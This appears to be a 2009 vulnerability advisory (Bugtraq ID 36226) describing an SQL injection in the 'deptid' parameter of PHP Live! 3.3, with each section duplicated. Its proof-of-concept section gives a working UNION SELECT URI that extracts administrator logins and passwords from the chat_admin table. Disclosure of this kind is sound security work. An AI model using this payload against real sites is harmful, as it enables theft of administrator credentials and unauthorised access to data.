PHP Live! 'deptid' Parameter SQL Injection Vulnerability
BID:36226
Info
PHP Live! 'deptid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 36226 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 02 2009 12:00AM |
| Updated: | Sep 02 2009 08:12PM |
| Credit: | v3n0m |
| Vulnerable: |
PHP Live! PHP Live! 3.3 |
| Not Vulnerable: | |
Discussion
PHP Live! 'deptid' Parameter SQL Injection Vulnerability
PHP Live! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Live! 3.3 is vulnerable; other versions may also be affected.
PHP Live! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Live! 3.3 is vulnerable; other versions may also be affected.
Exploit / POC
PHP Live! 'deptid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
[xxx] = Valid x number
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
[xxx] = Valid x number
Solution / Fix
PHP Live! 'deptid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].